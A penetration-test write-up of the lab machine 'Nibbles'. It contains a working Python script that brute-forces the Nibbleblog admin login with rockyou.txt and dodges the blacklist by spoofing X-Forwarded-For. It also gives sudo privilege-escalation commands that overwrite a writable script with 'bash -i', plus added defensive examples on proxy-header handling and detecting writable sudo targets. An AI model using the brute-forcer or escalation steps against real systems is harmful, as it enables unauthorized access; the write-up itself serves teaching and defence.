Lonely Nova's Workshop


Report - Nibbles Report

Nova_ 2023. 4. 23. 10:24

1. Port scan result

address        ports
10.10.10.75    22,80



2. Initial access - Nibbleblog plugin vulnerability

Vulnerability Explanation : The web application runs Nibbleblog, and the plugin version in use is 3.7. This version is affected by CVE-2015-6967, an authenticated arbitrary file upload in the "My image" plugin that gives code execution on the web server once admin credentials are known.


Vulnerability Fix : Update Nibbleblog and the vulnerable plugin to a release that is not affected by CVE-2015-6967.


Severity : critical


Steps to reproduce the attack : Exploiting this vulnerability requires a valid username and password, so the password has to be recovered first. I ran a dictionary attack against the "admin.php" login page, but the server blacklists a client after five failed login attempts. The blacklist identifies the client by the X-Forwarded-For header, so sending a fresh value in that header every few attempts bypasses the block.

screenshot :

The exploit code is below:

import sys
from random import randint

import requests

# Brute force information
PASSWORD_LIST = '/usr/share/wordlists/rockyou.txt'
RATE_LIMIT = 5                                # failed logins before a source is blacklisted
RATE_LIMIT_ERROR = 'Blacklist protection'     # text returned once a source is blacklisted
LOGIN_FAILED_ERROR = 'Incorrect username or password.'

# Target information
RHOST = '10.10.10.75'
LOGIN_PAGE = '/nibbleblog/admin.php'
TARGET_URL = f'http://{RHOST}{LOGIN_PAGE}'
USERNAME = 'admin'


def attempt_login(password: str, ip: str) -> bool:
    """Performs a login using a given password.

    :param password: The password to try.
    :param ip: Spoof the attacker's IP address with this one.
    :return: True for a successful login, otherwise False.
    """
    # The blacklist keys on X-Forwarded-For, so a new value looks like a new client.
    headers = {'X-Forwarded-For': ip}
    payload = {'username': USERNAME, 'password': password}
    r = requests.post(
        TARGET_URL, headers=headers, data=payload, timeout=10
    )

    if r.status_code == 500:
        print("Internal server error, aborting!")
        sys.exit(1)

    if RATE_LIMIT_ERROR in r.text:
        print("Rate limit hit, aborting!")
        sys.exit(1)

    return LOGIN_FAILED_ERROR not in r.text


def random_ip() -> str:
    """Generate a random IP address.

    :return: A random IP address.
    """
    return ".".join(str(randint(0, 255)) for _ in range(4))


def run(start_at: int = 1):
    """Start the brute force process.

    :param start_at: Start brute forcing at the password with
     this 1-based index. The number represents the line in
     the password file.
    """
    ip: str = random_ip()
    num_attempts: int = 1

    # rockyou.txt is not valid UTF-8 throughout; latin-1 decodes every byte.
    with open(PASSWORD_LIST, encoding='latin-1') as wordlist:
        for password in wordlist:
            if num_attempts < start_at:
                num_attempts += 1
                continue

            # Rotate the spoofed IP before any single value reaches the limit.
            if num_attempts % (RATE_LIMIT - 1) == 0:
                ip = random_ip()

            password = password.strip()
            print(f"Attempt {num_attempts}: {ip}\t\t{password}")

            if attempt_login(password, ip):
                print(f"Password for {USERNAME} is {password}")
                break

            num_attempts += 1


if __name__ == '__main__':
    run()
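The bypass works because the application treats a client-supplied X-Forwarded-For value as the client's identity. The following example is added here and is not part of the original report or of Nibbleblog: it models that blacklist in Python, with client_ip_naive reproducing the vulnerable behaviour, client_ip_hardened honouring the header only when the TCP peer is a trusted reverse proxy, and simulate replaying the exploit's rotating-header strategy against both. The proxy address 10.10.10.1, the attacker address 10.10.14.5, the 192.0.2.x spoofed values and the password are constructed for the demo.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Callable, Dict

RATE_LIMIT = 5  # failed logins before a source is blacklisted (same as the exploit above)
BLACKLIST_MSG = 'Blacklist protection'
LOGIN_FAILED_MSG = 'Incorrect username or password.'

# Assumed for the demo: only this reverse proxy may set X-Forwarded-For (constructed address).
TRUSTED_PROXIES = [ip_network('10.10.10.1/32')]

Resolver = Callable[[str, Dict[str, str]], str]


def client_ip_naive(peer_ip: str, headers: Dict[str, str]) -> str:
    """Vulnerable: whatever the client puts in X-Forwarded-For becomes its identity."""
    forwarded = headers.get('X-Forwarded-For')
    return forwarded.split(',')[0].strip() if forwarded else peer_ip


def client_ip_hardened(peer_ip: str, headers: Dict[str, str]) -> str:
    """Hardened: only honour X-Forwarded-For when the TCP peer is a trusted proxy."""
    peer = ip_address(peer_ip)
    forwarded = headers.get('X-Forwarded-For')
    if forwarded and any(peer in net for net in TRUSTED_PROXIES):
        # The last entry is the address the trusted proxy itself observed.
        return forwarded.split(',')[-1].strip()
    return peer_ip


class LoginGuard:
    """Minimal login endpoint with a per-source failure counter."""

    def __init__(self, resolve_ip: Resolver, real_password: str = 'correct-horse'):
        self.resolve_ip = resolve_ip
        self.real_password = real_password          # constructed secret
        self.failures: Dict[str, int] = defaultdict(int)

    def attempt(self, peer_ip: str, headers: Dict[str, str], password: str) -> str:
        source = self.resolve_ip(peer_ip, headers)
        if self.failures[source] >= RATE_LIMIT:
            return BLACKLIST_MSG
        if password == self.real_password:
            self.failures[source] = 0
            return 'ok'
        self.failures[source] += 1
        return LOGIN_FAILED_MSG


def simulate(resolve_ip: Resolver, total_attempts: int = 20) -> int:
    """Replay the exploit's strategy (new spoofed IP every RATE_LIMIT-1 tries) from a
    single attacker peer and return how many wrong guesses the server evaluated."""
    guard = LoginGuard(resolve_ip)
    attacker_peer = '10.10.14.5'                    # constructed attacker address
    evaluated = 0
    for i in range(total_attempts):
        spoofed = f'192.0.2.{i // (RATE_LIMIT - 1)}'
        result = guard.attempt(attacker_peer, {'X-Forwarded-For': spoofed}, f'guess{i}')
        if result == LOGIN_FAILED_MSG:
            evaluated += 1
    return evaluated


if __name__ == '__main__':
    print('naive resolver evaluated', simulate(client_ip_naive), 'of 20 guesses')
    print('hardened resolver evaluated', simulate(client_ip_hardened), 'of 20 guesses')
```

With the naive resolver every one of the 20 guesses reaches the password check, because each spoofed value only ever accumulates four failures; with the hardened resolver the attacker's real peer address is the key, so only the first five guesses are evaluated and the rest get the blacklist message.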

result :

The admin password recovered by the dictionary attack was then used to exploit CVE-2015-6967.


post-exploitation : 


3. Privilege escalation

Vulnerability Explanation : The sudo configuration is misconfigured: the user may run sudo /home/nibbles/personal/stuff/monitor.sh, and that script is writable by the same user, so whatever is placed in it runs as root. I injected a reverse shell into "monitor.sh" and executed it, but got a tty error, so I used bash -i instead.


Vulnerability Fix : Remove the sudo rule, and never let a low-privilege user write to a script that sudo runs as root.


Severity : critical

Steps to reproduce the attack : (the sudo rule is for the full path, so the script must be invoked by that path)

$ echo "bash -i" > /home/nibbles/personal/stuff/monitor.sh
$ sudo /home/nibbles/personal/stuff/monitor.sh
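The check a practitioner wants at this point is: of the commands sudo lets me run as root, which ones can I modify? The following Python example is added here and is not the author's code: it parses sudo -l output into rules and flags any command whose file, or whose parent directory (which allows the file to be replaced), the current user can write. The sample sudo -l output is constructed (the hostname Nibbles, the user nibbler and the NOPASSWD tag are assumptions; the report only says the script can be run with sudo), and demo() substitutes a stub for the writability check so it behaves the same on any machine. On a real host, feed the actual sudo -l output to parse_sudo_l and call writable_sudo_targets(rules) with the default os.access check.

```python
import os
import re
from pathlib import Path
from typing import Callable, Dict, List

# One sudo rule line: "(runas) [TAG: ...] /absolute/command ..."; tags such as NOPASSWD: are optional.
SUDO_RULE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)')


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Turn the rule lines of `sudo -l` output into dicts; non-rule lines are ignored."""
    rules = []
    for line in output.splitlines():
        m = SUDO_RULE.match(line)
        if m:
            rules.append({
                'runas': m.group('runas').strip(),
                'nopasswd': 'NOPASSWD' in m.group('tags'),
                'cmd': m.group('cmd'),
            })
    return rules


def default_writable(path: Path) -> bool:
    """Real check: can the current user write this path? (False if it does not exist.)"""
    return os.access(path, os.W_OK)


def writable_sudo_targets(rules, is_writable: Callable[[Path], bool] = default_writable) -> List[str]:
    """Commands we could alter: the file itself is writable, or its directory is."""
    hits = []
    for rule in rules:
        target = Path(rule['cmd'])
        if is_writable(target) or is_writable(target.parent):
            hits.append(str(target))
    return hits


def demo() -> List[str]:
    """Run the check against constructed sudo -l output with a stubbed writability test."""
    sample = (
        'Matching Defaults entries for nibbler on Nibbles:\n'
        '    env_reset, mail_badpass\n'
        '\n'
        'User nibbler may run the following commands on Nibbles:\n'
        '    (root) NOPASSWD: /home/nibbles/personal/stuff/monitor.sh\n'
        '    (root) /usr/bin/true\n'
    )
    rules = parse_sudo_l(sample)
    # Constructed: pretend only monitor.sh is writable by us, as in the report.
    writable = {'/home/nibbles/personal/stuff/monitor.sh'}
    return writable_sudo_targets(rules, is_writable=lambda p: str(p) in writable)


if __name__ == '__main__':
    for cmd in demo():
        print('sudo target we can modify:', cmd)
```

The parent-directory check matters as much as the file check: a root-owned script in a user-writable directory can simply be deleted and recreated, which gives the same result as overwriting it.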




post-exploitation :
